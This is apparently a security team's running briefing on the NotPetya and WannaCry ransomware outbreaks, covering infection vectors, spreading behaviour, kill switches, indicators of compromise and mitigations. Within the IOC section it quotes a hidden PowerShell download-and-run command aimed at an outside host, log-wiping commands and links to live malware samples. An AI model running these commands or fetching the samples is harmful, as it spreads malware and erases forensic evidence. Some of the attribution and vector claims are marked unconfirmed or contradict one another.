Need information for WannaCry?
Talos published a post describing the complete timeline of the NotPetya campaign, starting from infection at MeDoc to delivery : The MeDoc Connection.
Kaspersky published an article claiming that around the same time of the delivery of NotPetya another malware, also ransomware, was delivered via the update servers of MeDoc : In ExPetr/Petya’s shadow, FakeCry ransomware wave hits Ukraine. The ransomware contains a number of false flags to make it look like Wannacry.
There is little hope for those who payed the ransom in the hopes of unlocking encrypted hardware and recovering scrambled files. Researchers from Kaspersky Lab have discovered an error in the malware's code that prevents recovery of data. The ransomware part in NotPetya was a lure for the medea, whereas the real objective was the wiping of systems.
For those who'd like to disable the execution of psexec, please refer to this the blog article : Petya: disabling remote execution of psexec.
A number of security companies investigate on attribution or linking this campaign to previous malware campaigns.
So far no infection method via email has been found. This also means that the phishing delivering method is wrong and that CVE-2017-0199 did not play a role. The IPs listed in the IOC list are also not related to NotPetya. It doesn't harm monitoring these IPs for other ransomware waves (Loki?) but it will not protect you against NotPetya.
The update request for MeDoc seems to be querying the domain upd.me-doc.com.ua. If you are unsure if your organization uses MeDoc you can use your proxy server logs to track connections.
As extra migitation actions, next to those listed below :
Also read the excellent analysis by Cisco Talos
Information that is currently know about the NotPetya ransomware attack.
Rhere are two main delivery methods known :
Note that the initial spreading did not take place via exploits from the Shadow Brokers leak of NSA tools. Compared to WannaCry, spreading takes place on the internal network, once the attackers already had a foothold in the network of the victim.
Kaspersky reported that NotPetya was also delivered via a watering hole attack to spread via a drive-by download. The sources of this attack have been cleaned.
The malware has a set of capabilities allowing to work his way through the network of a victim. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for all the details :
Once it infects a host the further behavior depends on the malware process privilege level and the processes found to be running on the machine. Depending on processes found it will not infect the MBR or do network spreading via SMB.
If it does start encrypting the MBR, it will also schedule a reboot via a scheduled task (starts at a random time interval, between 10-60 minutes after infection).
Regardless of the privileges, it will always attempt to encrypt files on all fixed disks. It does not encrypt files in C:\Windows. There is no file extension added to encrypted files, the files are overwritten.
Note that by using the WMIC/PsExec/LSAdump hacking techniques, attackers can infect fully patched PCs found on local networks, including Windows 10.
Logs are also deleted (wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:v )
The code that is used for ETERNALBLUE is a cleaned-up code compared to sample used with WannaCry. This indicates some thought has been given to run this campaign.
There is a kill switch, but differently to WannaCry where it required a functioning network connection to a domain this kill switch has to be applied locally. Creating a file C:\Windows\perfc should prevent the encryption. Do note that the kill switch does not prevent network spreading, it only prevents a machine from getting encrypted. Placing perfc will only protect against current versions. NotPetya checks for a file with the same name as the filename that it was started from. If this gets changed to abcdef.dll the new variants will check for "C:\Windows\abcdef
The malware itself is well written and goes to a couple of hoops to bypass AV detection (making use of a fake Microsoft signature and using XOR encrypted shellcode payload). On the other the payment chain (which is, from an attacker point of view the 'return on investment' part) is very bad. A nummber of reports came out that this worm is not meant to "montize" but rather to cause as much damage as possible, see Pnyetya: Yet Another Ransomware Outbreak.
The ransomware is delivered via "normal" Office documents, by the modified ETERNALBLUE exploit or by an attack against the update mechanism of MeDoc.
The ransomware captures credentials for spreading, using tools similar to Mimikatz. Credentials are extracted from the lsass.exe process. These credentials are then passed on to PsExec or WMIC for further spreading.
The malware waits 10-60 minutes after infection to reboot the system. Once rebooted it starts to encrypt the MFT table in NTFS partitions.
It spreads by enumerating all known server names via NetBIOS and also retrieves a list of DHCP leases. Each IP that has port 445 or 139 open is attacked.
The Petya ransomware, also known as Petwrap, is ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one. Instead, Petya reboots victims computers and encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk.
The current wave of Petya uses worm-like behaviour by exploiting ETERNALBLUE (also see the WannaCry advice) and CVE-2017-0199.
Note that according to Kaspersky this variant is not related to known version of Petya, hence the name NotPetya.
The spreading of the worm seems to be limited to the local network.
See https://community.rapid7.com/community/infosec/blog/2017/06/27/petya-ransomware-explained and https://blog.fox-it.com/2017/06/27/liveblog-huge-petya-ransomware-wave/. According to Fox-IT this is because it looks at the DHCP leases. This is confirmed by Kaspersky : The malware enumerates all network adapters, all known server names via NetBIOS and also retrieves the list of current DHCP leases, if available. Each and every IP on the local network and each server found is checked for open TCP ports 445 and 139. Those machines that have these ports open are then attacked.
The local spreading means that there is another initial infection vector. According to Rapid7 this happened via the (normal) ransomware infection, a weaponized document that gets opened by a user. See further in the IOC list (.doc , .xls)?
Rumours are that Petya Ransomware is also taking advantage of WMIC and PSEXEC tools to infect fully-patched Windows computers. You are advised to disable WMIC (or block it to IT admin networks only) https://msdn.microsoft.com/en-us/library/aa826517(v=vs.85).aspx. It dumps passwords and then uses PSEXEC and WMIC to move laterally.
According to Securelist, spreading can only happen on an infected system on the network possessing administrative credentials.
Some posts report that the ransomware is also using a client side vulnerability (CVE-2017-0199). Info on CVE-2017-0199 is available at https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/. A patch was made available in April-17 by Microsoft : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199. and https://support.microsoft.com/en-hk/help/3141538/description-of-the-security-update-for-office-2010-april-11-2017.
For CVE-2017-0199 : Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.
Infection via CVE-2017-0199 is unconfirmed. It might be that one of the host sharing a sample was already infected with Loki ransomware.
Petya makes use of a Bitcoin address. You can monitor the number of payments via https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. Do not pay the ransom!
A number of posts report on a kill switch (UNCONFIRMED)
Placing a file c:\windows\myguy or c:\windows\perfc
These IOCs have been made available via https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 and https://gist.githubusercontent.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759/raw/a5811d9371a3c07033d5c0fd23976d05cf86c8d8/Petya_ransomware.txt
*********** Possible IP addresses: 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 *********** Email: [email protected] *********** Malware dropped file: http://220.127.116.11/~alex/svchost.exe *********** Hashes by codexgigas team: For 18.104.22.168, we have: a809a63bc5e31670ff117d838522dec433f74bee bec678164cedea578a7aff4589018fa41551c27f d5bf3f100e7dbcc434d7c58ebf64052329a60fc2 aba7aa41057c8a6b184ba5776c20f7e8fc97c657 0ff07caedad54c9b65e5873ac2d81b3126754aac 51eafbb626103765d3aedfd098b94d0e77de1196 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f As droppers And for 22.214.171.124: 7ca37b86f4acc702f108449c391dd2485b5ca18c 2bc182f04b935c7e358ed9c9e6df09ae6af47168 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5 82920a2ad0138a2a8efc744ae5849c6dde6b435d *********** Targeted extensions by @GasGeverij .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip. *********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning - - - - - - - - - - - - - - - - - - - - - - - - File Name Order-20062017.doc (RTF із CVE-2017-0199) MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1 SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84 SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206 File Size 6215 bytes File Type Rich Text Format data Connects to the host: 126.96.36.199 80 h11p://188.8.131.52/myguy.xls File Name myguy.xls MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25 SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73 SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6 File Size 13893 bytes File Type Zip archive data mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324) powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) 10807.exe %APPDATA%\10807.exe" " (PID: 3096) File Name BCA9D6.exe MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060 SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD File Size 275968 bytes !!!! Unproofed Connects to the host: 184.108.40.206 80 COFFEINOFFICE.XYZ 80 Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part. *********** IOС by Informzachita (infosec.ru) type,value,comment,to_ids,date Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627 Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627 Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627 Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627 Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627 Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627 Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627 Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627 Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627 Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627 Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627 Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627 Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627 Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627 Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627 Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627 Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627 Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627 Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627 Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627 Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627 Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627 Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627 Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627 Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627 Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627 Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627 Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627 Payload delivery,filename,"dllhost.dat","",1,20170627 External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627 External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627 External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627 External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627 External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627 External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627 Network activity,url,"http://220.127.116.11/~alex/svchost.exe","",1,20170627 Network activity,url,"http://18.104.22.168/myguy.xls","",1,20170627 Network activity,ip-dst|port,"22.214.171.124|80","Order-20062017.doc",1,20170627 Network activity,email-dst,"[email protected]","",1,20170627 Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627 Network activity,ip-dst|port,"126.96.36.199|80","",1,20170627 Network activity,domain,"coffeinoffice.xyz","",1,20170627 Network activity,ip-dst,"188.8.131.52","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627 Network activity,ip-dst,"184.108.40.206","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627 Network activity,ip-dst,"220.127.116.11","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627 Network activity,ip-dst,"18.104.22.168","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627 Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627 Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627 Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627 Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627 External analysis,vulnerability,"CVE-2017-0144","",0,20170627 External analysis,comment,"attack-vector:phishing","",0,20170627
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/ https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 https://twitter.com/PolarToffee/status/879709615675641856 https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/ https://www.hybrid-analysis.com/sample/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206?environmentId=100 https://www.hybrid-analysis.com/sample/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6?environmentId=100 https://twitter.com/PolarToffee/status/879709615675641856
Samples are at
https://yadi.sk/d/QT0l_AYg3KXCqc https://yadi.sk/d/S0-ZhPY53KWc84 https://yadi.sk/d/Zpkm88sp3KWc8v Archive password: virus
Articles from Kaspersky and Cyphort on a crypto-miner targeting Linux hosts running vulnerable Samba servers. Patch Samba (4.6.4/4.5.10/4.4.14). Use your logs to observe exploitation attempts (write attempts for file consisting of 8 random symbols).
Individual machines could be infected - researchers and testers who put WannaCry on Windows XP systems likely ran it manually - but the worm-like attack code would not spread from an XP PC
According to Symantec : https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
OTX has another set of IOCs.
Decryption possible for Windows XP to 7, including Windows 2003
According to cyphort the vulnerability used by WannaCry (ETERNALBLUE) is now also used to spread a trojan.
Proofpoint published information on a cryptocurrency mining malware also making use of ETERNALBLUE/DOUBLEPULSAR. This malware predates (possible as early as 24-Apr) WannaCry.
Shadow Brokers issued a statement. ETERNALBLUE was part of the exploit leading to WannaCry.
Some researchers confuse the Jaff ransomware with WannaCry. Jaff is more a "traditional" style ransomware, explained in detail by Talos http://blog.talosintelligence.com/2017/05/jaff-ransomware.html. It's not the same as WannaCry.
Uiwix, has begun to spread by exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used.
Detected by VirusTotal b9318a66fa7f50f2f3ecaca02a96268ad2c63db7554ea3acbde43bf517328d06
Two new variants were found. See https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e
Do not rely on these kill switches as single line of defense. The behavior of the malware can easily be changed so that these kill switches are no longer relevant! Also, Wannacry is not proxy aware. If you are in a proxied environment they will not help unless you setup an RPZ.
The patch is out since March 2017. Your patch management process should apply patches rated as critical in a timely manner. See https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Microsoft also provided mitigation measures for unsupported systems.
Windows 10 and Windows Server 2016 are protected in their default configuration.
An article posted on the Trend Micro blog why Why "Just Patch It!" Isn't as Easy as You Think.
Disable SMBv1. This is described in a Microsoft document : https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012
For example on Windows 8 you can do this in PowerShell
Blocking legacy protocols is always recommended!
UPDATE According to WannaCry FAQ: What you need to know today : The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection ... disabling SMBv2 can cause problems
All systems exposed to the Internet should filter NetBIOS, SMB and RDP.
Do not assume that a corporate firewall is enough. Systems connecting through a VPN might be exposed to the Internet prior to starting the VPN. Also do not forget systems that are dual-homed. If one system is infected, introducing it later on the network is enough.
Internal network filtering
Use local host firewalling on all you systems. Not every system needs to have SMB and RDP available on the network!
Apply network segmentation.
If you run CIFS (a variant of SMB) you are also targeted.
So far for RDP it looks like it's used as an initial attack vector via brute-force (guessing weak credentials). Once access gained via RDP, Wannacry is deployed and can spread automatically.
Do not forget that backup servers can be a target also. Make sure the backup retention period is enough.
Backups must be off-line (detached from network connectivity or system connectivity).
Use a dedicated backup solution that is not using SMB!
No you should not. When the malware is capable of reaching the kill-switch domain it will not further spread the malware. When you block this domain, it will continue spreading both internal and external and start encrypting your files.
Centrally log the events of your servers and workstations so that you know what is going on. Combine this information with network events.
Use threat intelligence data / alerts on these events.
The Wannacry ransomware is not proxy aware. This means that organizations that use a corporate proxy will not benefit from the kill switch. See https://blog.didierstevens.com/2017/05/13/quickpost-wcry-killswitch-check-is-not-proxy-aware/
The solution is to add the kill switch domains to an internal RPZ zone and redirect requests to an internal sinkhol. Note that the ransomware does expect an HTTP reply.
Note: no sample of the phishing e-mail that delivered the ransomware has been found (so far). Not sure about initial attack (maybe infected USB introduced on network?).
Good security practice.
Repeat awareness campaigns!
Update your anti virus definitions to prevent further infections. Anti virus definitions need time to include the new variants : do not rely on your anti virus / anti malware solution as the single line of defense.
UPDATE : It is important to note that anti-virus can potentially stop such attacks, even before researchers have seen a sample, ref. Modern Security Software not powerless against threats wannacry.
A script has been developed by CCN that prevents the ransomware from starting to encrypt your files. It does this by creating the mutexes for which the ransomware checks. Note that the script needs to be run at every reboot. : https://loreto.ccn-cert.cni.es/index.php/s/tYxMah1T7x7FhND. Also see : https://twitter.com/EC3Europol/status/863492271911645184
Afterwards, yo can check for the presence of the mutex with : handle -a | findstr MsWinZonesCacheCounterMutex. The Handle command can be downloaded from Sysinternals : https://download.sysinternals.com/files/Handle.zip
Further info on the mutexes is available at https://blog.didierstevens.com/2017/05/14/quickpost-wannacrys-mutex-is-mswinzonescachecountermutexa0-digit-zero-at-the-end/ and here https://twitter.com/craiu/status/863720216714518528.
There is an alternative tool (not tested) that accomplishes the same : https://github.com/HackerFantastic/Public/blob/master/tools/WCRYSLAP.zip
UPDATE Another tool to create the mutexes, TearSt0pper.
Subscribe to a threat intelligence feed to get early indicators and detection. See MISP platform
An NSE script for NMAP to detect the MS17-010 was published http://seclists.org/nmap-dev/2017/q2/79
A massive wave of ransomware that has all the characteristics of a worm. It utilises an exploit called ETERNALBLUE as well as leveraging a persistent backdoor known as DOUBLEPULSAR (both were part of the Shadow Brokers leak of NSA tools). ETERNALBLUE exploits a vulnerability in the Microsoft SMBv1 protocol. Exploiting this vulnerability allows an attacker to execute code on the vulnerable host.
Microsoft patched this vulnerablity in March, via MS17-010. Microsoft also released a patch for systems that were no longer under support.
The malware is persistent, meaning it will survive a system reboot!
Although there are claims that the infection happened via phishing e-mail, no sample of such a mail has been analyzed.
Segment and isolate networks that have infected machines.
Limiting SMB connections will hugely affect your users because they will not be able to access the file servers. There's no need for your workstations for not filtering incoming SMB connections. This will prevent further spreading.
For Belgium : [email protected]
There may be a possibility to recover the encryption (and hence recover the encrypted files) on Windows XP, if it was not rebooted after infection.
According to WannaCry- Decrypting files with WanaKiwi + Demos the decryption works for both Windows XP (x86 confirmed) and Windows 7 (x86 confirmed). This would imply it works for every version of Windows from XP to 7, including Windows 2003 (x86 confirmed), Vista and 2008 and 2008 R2.
In order to decrypt the files it is important that
Do not delete the encrypted files yet, it might be possible that a decryption key may become available at some point in the future. There are however no guarantees that this will be possible.
According to Kaspersky Lab there is strong evidence linking the WannaCry ransomware code to North Korea. There is a code overlap between Wannacry and a sample attributed to Lazarus in 2015. Note that the Lazarus group is believed to be responsible for the Sony Wiper attack, the Bangladesh bank heist and the DarkSeoul operation. ... "a theory a false flag although possible, is improbable."
Wannacry uses only four individual bitcoin addresses. There is no automatic identification between a payment and an encryption, meaning that the validation has to be a manual process. Most ransomware automates this process to provide a better "service" to their victims. Also see the article of Wired.
A live map can be found here : https://intel.malwaretech.com/WannaCrypt.html
Create a mutex (manually) ; PS :: $mtx = New-Object System.Threading.Mutex($false, "TestMutex")
Maintained by cudeso